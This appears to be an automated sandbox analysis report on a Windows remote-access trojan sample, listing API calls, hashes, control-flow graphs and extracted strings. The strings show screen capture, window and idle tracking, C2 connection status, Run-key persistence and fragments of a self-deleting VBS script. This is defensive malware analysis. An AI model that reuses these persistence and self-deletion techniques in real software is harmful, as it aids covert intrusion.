                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 61b1c066cbf1f6e44ea73c093b6391bf97cae0235be39f00c5f2dbf4af9b1548
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: 61b1c066cbf1f6e44ea73c093b6391bf97cae0235be39f00c5f2dbf4af9b1548
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser
                                • String ID:
                                • API String ID: 4229901323-0
                                • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.3 Pro), ref: 0040F8E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$ErrorLastLocalTime
                                • String ID: | $%I64u$4.9.3 Pro$8SG$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Pj$PSG$Rmc-4QQORA$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                • API String ID: 524882891-3908098953
                                • Opcode ID: ae63a67796a2acb5c78b155b8e05be1889c50b4469c3c0008c8dcc1c20085293
                                • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                • Opcode Fuzzy Hash: ae63a67796a2acb5c78b155b8e05be1889c50b4469c3c0008c8dcc1c20085293
                                • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                • GetCursorInfo.USER32(?), ref: 00418FA7
                                • GetIconInfo.USER32(?,?), ref: 00418FBD
                                • DeleteObject.GDI32(?), ref: 00418FEC
                                • DeleteObject.GDI32(?), ref: 00418FF9
                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                • DeleteDC.GDI32(?), ref: 0041917C
                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                • DeleteObject.GDI32(00000000), ref: 00419182
                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                • DeleteObject.GDI32(00000000), ref: 00419241
                                • GlobalFree.KERNELBASE(?), ref: 00419248
                                • DeleteDC.GDI32(?), ref: 00419258
                                • DeleteDC.GDI32(00000000), ref: 00419263
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 4256916514-865373369
                                • Opcode ID: 401f32e55b766b667a82985f611144001aa3f951cfdd06aec026960ff572dfcf
                                • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                • Opcode Fuzzy Hash: 401f32e55b766b667a82985f611144001aa3f951cfdd06aec026960ff572dfcf
                                • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,Pj,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Pj$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2351991084
                                • Opcode ID: 14986363c28eb5bf87fb1fe0f5b02e3cdd437185146d2719f14acd65f79ffd4a
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 14986363c28eb5bf87fb1fe0f5b02e3cdd437185146d2719f14acd65f79ffd4a
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                                • String ID: 8SG$8SG$hdF$pQG$pQG$PG$PG
                                • API String ID: 110482706-4009011672
                                • Opcode ID: 1b86f33e2813ac9ce889fc21d85687f64281119cd91f5dea58d0e0166611a616
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 1b86f33e2813ac9ce889fc21d85687f64281119cd91f5dea58d0e0166611a616
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-2151626615
                                • Opcode ID: fa9dc16280b74e41472a6a3d9ec0168782aacc7c5f81dfffe069f112667f44de
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: fa9dc16280b74e41472a6a3d9ec0168782aacc7c5f81dfffe069f112667f44de
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                • GetForegroundWindow.USER32 ref: 0040AD49
                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: 0353f8177fafd3cd9a3a1f2f9d997a593271c35778fb8a74e0f6d4403574b366
                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                • Opcode Fuzzy Hash: 0353f8177fafd3cd9a3a1f2f9d997a593271c35778fb8a74e0f6d4403574b366
                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1472 40da34-40da59 call 401f86 1475 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1472->1475 1476 40da5f 1472->1476 1500 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1475->1500 1477 40da70-40da7e call 41b5b4 call 401f13 1476->1477 1478 40da91-40da96 1476->1478 1479 40db51-40db56 1476->1479 1480 40daa5-40daac call 41bfb7 1476->1480 1481 40da66-40da6b 1476->1481 1482 40db58-40db5d 1476->1482 1483 40da9b-40daa0 1476->1483 1484 40db6e 1476->1484 1485 40db5f-40db64 call 43c0cf 1476->1485 1503 40da83 1477->1503 1487 40db73-40db78 call 43c0cf 1478->1487 1479->1487 1501 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1480->1501 1502 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1480->1502 1481->1487 1482->1487 1483->1487 1484->1487 1492 40db69-40db6c 1485->1492 1497 40db79-40db7e call 409057 1487->1497 1492->1484 1492->1497 1497->1475 1501->1503 1509 40da87-40da8c call 401f09 1502->1509 1503->1509 1509->1475
                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: aa652be1f29e0a7c33d43a87d655e5c017c40b6912c980d0cec9b2528de70772
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: aa652be1f29e0a7c33d43a87d655e5c017c40b6912c980d0cec9b2528de70772
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1636 41c3f1-41c402 1637 41c404-41c407 1636->1637 1638 41c41a-41c421 1636->1638 1639 41c410-41c418 1637->1639 1640 41c409-41c40e 1637->1640 1641 41c422-41c43b CreateFileW 1638->1641 1639->1641 1640->1641 1642 41c441-41c446 1641->1642 1643 41c43d-41c43f 1641->1643 1645 41c461-41c472 WriteFile 1642->1645 1646 41c448-41c456 SetFilePointer 1642->1646 1644 41c47f-41c484 1643->1644 1648 41c474 1645->1648 1649 41c476-41c47d FindCloseChangeNotification 1645->1649 1646->1645 1647 41c458-41c45f CloseHandle 1646->1647 1647->1643 1648->1649 1649->1644
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                • String ID: hpF
                                • API String ID: 1087594267-151379673
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1650 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1661 41b35d-41b366 1650->1661 1662 41b31c-41b32b call 4135a6 1650->1662 1663 41b368-41b36d 1661->1663 1664 41b36f 1661->1664 1667 41b330-41b347 call 401fab StrToIntA 1662->1667 1666 41b374-41b37f call 40537d 1663->1666 1664->1666 1672 41b355-41b358 call 401fd8 1667->1672 1673 41b349-41b352 call 41cf69 1667->1673 1672->1661 1673->1672
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
